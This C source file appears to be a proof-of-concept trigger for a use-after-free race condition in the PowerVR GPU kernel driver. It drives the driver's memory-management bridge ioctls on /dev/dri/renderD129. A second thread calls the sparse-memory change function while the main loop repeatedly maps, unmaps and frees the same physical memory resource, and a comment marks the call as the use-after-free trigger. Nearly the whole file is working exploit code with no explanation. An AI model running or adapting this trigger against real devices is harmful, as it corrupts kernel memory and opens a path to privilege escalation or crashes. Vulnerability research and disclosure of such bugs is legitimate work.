#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <inttypes.h>
#include <sched.h>
#include <err.h>
#include <assert.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>

#define __packed __attribute__((packed))

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }

/* =====================   BRIDGE   ===================== */
static int gpu_fd;

#define DRM_IOCTL_PVR_SRVKM_INIT 0x40046445
#define PVR_SRVKM_SERVICES_INIT  1
#define PVR_SRVKM_SYNC_INIT 2
struct drm_pvr_srvkm_init_data {
        uint32_t init_module;
};
static void srvkm_init(int fd, int mode) {
  struct drm_pvr_srvkm_init_data data = { .init_module = mode };
  SYSCHK(ioctl(fd, DRM_IOCTL_PVR_SRVKM_INIT, &data));
}

struct drm_pvr_srvkm_cmd {
  uint32_t bridge_id;
  uint32_t bridge_func_id;
  uint64_t in_data_ptr;
  uint64_t out_data_ptr;
  uint32_t in_data_size;
  uint32_t out_data_size;
};
#define DRM_IOCTL_PVR_SRVKM_CMD 0xc0206440

static int driver_cmd(int bridge_id, int bridge_func_id, void *in_data, void *out_data, int in_size, int out_size) {
  struct drm_pvr_srvkm_cmd cmd = {
    .bridge_id = bridge_id,
    .bridge_func_id = bridge_func_id,
    .in_data_ptr = (unsigned long)in_data,
    .out_data_ptr = (unsigned long)out_data,
    .in_data_size = in_size,
    .out_data_size = out_size
  };
  return ioctl(gpu_fd, DRM_IOCTL_PVR_SRVKM_CMD, &cmd);
}
#define do_driver_cmd_noerror(bridge_id, bridge_func_id) ({                                \
    SYSCHK(driver_cmd((bridge_id), (bridge_func_id), &in, &out, sizeof(in), sizeof(out))); \
})
#define do_driver_cmd(bridge_id, bridge_func_id) ({                                        \
    do_driver_cmd_noerror((bridge_id), (bridge_func_id));                                  \
    if (out.eError != 0) errx(1, #bridge_func_id " eError %u", out.eError);                \
})

typedef void *IMG_HANDLE;
typedef int PVRSRV_ERROR;
typedef uint64_t IMG_DEV_VIRTADDR;
typedef uint64_t IMG_DEVMEM_SIZE_T;
typedef uint64_t IMG_DEVMEM_ALIGN_T;
typedef uint64_t IMG_DEVMEM_OFFSET_T;
typedef uint32_t IMG_DEVMEM_LOG2ALIGN_T;
typedef unsigned int    IMG_UINT;
typedef int                             IMG_INT;
typedef uint8_t                 IMG_UINT8,      *IMG_PUINT8;
typedef uint8_t                 IMG_BYTE,       *IMG_PBYTE;
typedef int8_t                  IMG_INT8;
typedef char                    IMG_CHAR,       *IMG_PCHAR;
typedef uint16_t                IMG_UINT16,     *IMG_PUINT16;
typedef int16_t                 IMG_INT16;
typedef uint32_t                IMG_UINT32,     *IMG_PUINT32;
typedef int32_t                 IMG_INT32,      *IMG_PINT32;
typedef uint64_t                IMG_UINT64,     *IMG_PUINT64;
typedef int64_t                 IMG_INT64;
typedef IMG_UINT64 PVRSRV_MEMALLOCFLAGS_T;
typedef int32_t PVRSRV_FENCE;
typedef int32_t PVRSRV_TIMELINE;
typedef IMG_UINT32      IMG_PID;

#define PVRSRV_BRIDGE_MM 6UL

#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED_WC      (0ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_UNCACHED         (1ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_COHERENT   (2ULL<<8)
#define PVRSRV_MEMALLOCFLAG_GPU_CACHE_INCOHERENT (3ULL<<8)

#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC      (0ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_UNCACHED         (1ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_COHERENT   (2ULL<<11)
#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT (3ULL<<11)

#define PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN       (1ULL<<19)

#define PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2 47
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2_TAG
{
        IMG_DEV_VIRTADDR sAddress;
        IMG_DEVMEM_SIZE_T uiLength;
        IMG_HANDLE hDevmemServerHeap;
        PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2_TAG
{
        IMG_HANDLE hReservation;
        PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2;
static IMG_HANDLE create_reservation(IMG_HANDLE heap, uint64_t base, uint64_t len) {
  PVRSRV_BRIDGE_IN_DEVMEMINTRESERVERANGE2 in = {
    .sAddress = base,
    .uiLength = len,
    .hDevmemServerHeap = heap,
    .uiFlags = 0xff/*CPU+GPU R+W*/ | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_UNCACHED_WC
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTRESERVERANGE2 out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTRESERVERANGE2);
  return out.hReservation;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE 15
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE_TAG
{
        int bbKernelMemoryCtx;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE_TAG
{
        IMG_HANDLE hDevMemServerContext;
        IMG_HANDLE hPrivData;
        int eError;
        unsigned int ui32CPUCacheLineSize;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE;
static IMG_HANDLE create_device_memory_context(IMG_HANDLE *priv_data_out) {
  PVRSRV_BRIDGE_IN_DEVMEMINTCTXCREATE in = { .bbKernelMemoryCtx = false };
  PVRSRV_BRIDGE_OUT_DEVMEMINTCTXCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTCTXCREATE);
  *priv_data_out = out.hPrivData;
  return out.hDevMemServerContext;
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE 17
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE_TAG
{
  IMG_DEV_VIRTADDR sHeapBaseAddr;
  IMG_DEVMEM_SIZE_T uiHeapLength;
  IMG_HANDLE hDevmemCtx;
  IMG_UINT32 ui32Log2DataPageSize;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE_TAG
{
  IMG_HANDLE hDevmemHeapPtr;
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE;
static IMG_HANDLE create_heap(IMG_HANDLE mem_ctx, uint64_t base_addr, uint64_t length, unsigned int page_size_log2) {
  PVRSRV_BRIDGE_IN_DEVMEMINTHEAPCREATE in = {
    .sHeapBaseAddr = base_addr,
    .uiHeapLength = length,
    .hDevmemCtx = mem_ctx,
    .ui32Log2DataPageSize = page_size_log2
  };
  PVRSRV_BRIDGE_OUT_DEVMEMINTHEAPCREATE out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTHEAPCREATE);
  return out.hDevmemHeapPtr;
}

#define PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR     10
typedef struct PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_DEVMEM_SIZE_T uiChunkSize;
  IMG_DEVMEM_SIZE_T uiSize;
  IMG_UINT32 *pui32MappingTable;
  const IMG_CHAR *puiAnnotation;
  IMG_UINT32 ui32AnnotationLength;
  IMG_UINT32 ui32Log2PageSize;
  IMG_UINT32 ui32NumPhysChunks;
  IMG_UINT32 ui32NumVirtChunks;
  IMG_UINT32 ui32PDumpFlags;
  IMG_PID ui32PID;
  PVRSRV_MEMALLOCFLAGS_T uiFlags;
} __packed PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
typedef struct PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR_TAG
{
  IMG_HANDLE hPMRPtr;
  PVRSRV_ERROR eError;
  PVRSRV_MEMALLOCFLAGS_T uiOutFlags;
} __packed PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR;
// non-sparse, locked
static IMG_HANDLE alloc_pmr_sparse() {
  uint32_t mapping_table[1] = { 0 }; // virtual chunk idx by physical chunk idx ?
  uint64_t heap_idx = 1; // cpu-local
  uint64_t cache_flags = PVRSRV_MEMALLOCFLAG_CPU_CACHE_INCOHERENT | PVRSRV_MEMALLOCFLAG_GPU_UNCACHED | PVRSRV_MEMALLOCFLAG_CPU_CACHE_CLEAN;
  PVRSRV_BRIDGE_IN_PHYSMEMNEWRAMBACKEDLOCKEDPMR in = {
    .uiChunkSize = 0x1000,
    .uiSize = 0x2000,
    .pui32MappingTable = mapping_table,
    .puiAnnotation = "foobar",
    .ui32AnnotationLength = 7,
    .ui32Log2PageSize = 12,
    .ui32NumPhysChunks = 1, // ?
    .ui32NumVirtChunks = 2,
    .ui32PDumpFlags = 0,
    .ui32PID = 0,
    .uiFlags = 0xf/*GPU RW, remap ok*/ | 0xf0/*CPU RW, remap ok*/ | cache_flags |
               (/*kernel-mappable*/0<<14) | (/*on-demand*/0<<15) | (/*SVM*/0<<17) |
               (/*sparse no dummy*/0<<18) |
               (/*zero backing*/0<<20) | (heap_idx << 59)
  };
  PVRSRV_BRIDGE_OUT_PHYSMEMNEWRAMBACKEDLOCKEDPMR out = {};
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PHYSMEMNEWRAMBACKEDLOCKEDPMR);
  return out.hPMRPtr;
}

#define PVRSRV_BRIDGE_MM_PMRUNREFUNLOCKPMR 8
typedef struct PVRSRV_BRIDGE_IN_PMRUNREFUNLOCKPMR_TAG
{
        IMG_HANDLE hPMR;
} __packed PVRSRV_BRIDGE_IN_PMRUNREFUNLOCKPMR;
typedef struct PVRSRV_BRIDGE_OUT_PMRUNREFUNLOCKPMR_TAG
{
        PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_PMRUNREFUNLOCKPMR;
static void free_pmr(IMG_HANDLE pmr) {
  PVRSRV_BRIDGE_IN_PMRUNREFUNLOCKPMR in = { .hPMR = pmr };
  PVRSRV_BRIDGE_OUT_PMRUNREFUNLOCKPMR out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_PMRUNREFUNLOCKPMR);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2     49
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2_TAG
{
  IMG_HANDLE hDevmemServerHeap;
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2;
static void map_pmr(IMG_HANDLE heap, IMG_HANDLE pmr, IMG_HANDLE resv) {
  PVRSRV_BRIDGE_IN_DEVMEMINTMAPPMR2 in = { .hDevmemServerHeap = heap, .hPMR = pmr, .hReservation = resv };
  PVRSRV_BRIDGE_OUT_DEVMEMINTMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2     50
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2_TAG
{
  IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2;
static void unmap_pmr(IMG_HANDLE res) {
  PVRSRV_BRIDGE_IN_DEVMEMINTUNMAPPMR2 in = { .hReservation = res };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNMAPPMR2 out;
  do_driver_cmd(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNMAPPMR2);
}

#define PVRSRV_BRIDGE_MM_CHANGESPARSEMEM2     46
typedef struct PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2_TAG
{
  IMG_UINT64 ui64CPUVAddr;
  IMG_HANDLE hPMR;
  IMG_HANDLE hReservation;
  IMG_HANDLE hSrvDevMemHeap;
  IMG_UINT32 *pui32AllocPageIndices;
  IMG_UINT32 *pui32FreePageIndices;
  IMG_UINT32 ui32AllocPageCount;
  IMG_UINT32 ui32FreePageCount;
  IMG_UINT32 ui32SparseFlags;
} __packed PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2;
typedef struct PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2_TAG
{
  PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2;

#define PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE2 48
typedef struct PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2_TAG
{
        IMG_HANDLE hReservation;
} __packed PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2;
typedef struct PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2_TAG
{
        PVRSRV_ERROR eError;
} __packed PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2;
static void unreserve(IMG_HANDLE res) {
retry:;
  PVRSRV_BRIDGE_IN_DEVMEMINTUNRESERVERANGE2 in = { .hReservation = res };
  PVRSRV_BRIDGE_OUT_DEVMEMINTUNRESERVERANGE2 out;
  do_driver_cmd_noerror(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_DEVMEMINTUNRESERVERANGE2);
  if (out.eError == 0)
    return;
  if (out.eError == 327/*still referenced*/)
      goto retry;
  errx(1, "unreserve eError %u", out.eError);
}



static int launch_eventfd = -1;
static int done_eventfd = -1;

static IMG_HANDLE heap_general;
static IMG_HANDLE bogo_pmr;
static IMG_HANDLE sparse_res;
static void *thread_fn(void *dummy) {
  struct sched_param sp = { .sched_priority = 0 };
  SYSCHK(sched_setscheduler(0, SCHED_IDLE, &sp));
  while (1) {
    eventfd_t ev_dummy;
    SYSCHK(eventfd_read(launch_eventfd, &ev_dummy));

    // trigger UAF access to sparse_pmr (as sparse_res->psMappedPMR)
    IMG_UINT32 free_indices[] = { 0 };
    PVRSRV_BRIDGE_IN_CHANGESPARSEMEM2 in = {
      .hPMR = bogo_pmr,
      .hReservation = sparse_res,
      .hSrvDevMemHeap = heap_general,
      .pui32FreePageIndices = free_indices,
      .ui32FreePageCount = sizeof(free_indices)/sizeof(free_indices[0]),
      .ui32SparseFlags = 2/*SPARSE_RESIZE_FREE*/,
    };
    PVRSRV_BRIDGE_OUT_CHANGESPARSEMEM2 out;
    do_driver_cmd_noerror(PVRSRV_BRIDGE_MM, PVRSRV_BRIDGE_MM_CHANGESPARSEMEM2);

    SYSCHK(eventfd_write(done_eventfd, 1));
  }
}

int main(void) {
  setbuf(stdout, NULL);
  printf("PID=%d\n", getpid());

  launch_eventfd = SYSCHK(eventfd(0, 0));
  done_eventfd = SYSCHK(eventfd(0, 0));

  pin_to(0); // no concurrent execution of threads!

  gpu_fd = SYSCHK(open("/dev/dri/renderD129", O_RDWR));
  srvkm_init(gpu_fd, PVR_SRVKM_SERVICES_INIT);
  IMG_HANDLE hPrivData;
  IMG_HANDLE ctx = create_device_memory_context(&hPrivData);

  heap_general = create_heap(ctx, 0x8000000000, 0x2000000000, 12);

  sparse_res = create_reservation(heap_general, 0x8000000000, 0x2000);

  bogo_pmr = alloc_pmr_sparse();

  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    errx(1, "pthread_create");

  while (1) {
    IMG_HANDLE sparse_pmr = alloc_pmr_sparse();
    map_pmr(heap_general, sparse_pmr, sparse_res);

    SYSCHK(eventfd_write(launch_eventfd, 1));
    struct timespec sleep_req = { .tv_nsec = random() % 1000 };
    nanosleep(&sleep_req, NULL);

    unmap_pmr(sparse_res);
    free_pmr(sparse_pmr);

    eventfd_t ev_dummy;
    SYSCHK(eventfd_read(done_eventfd, &ev_dummy));
  }
}
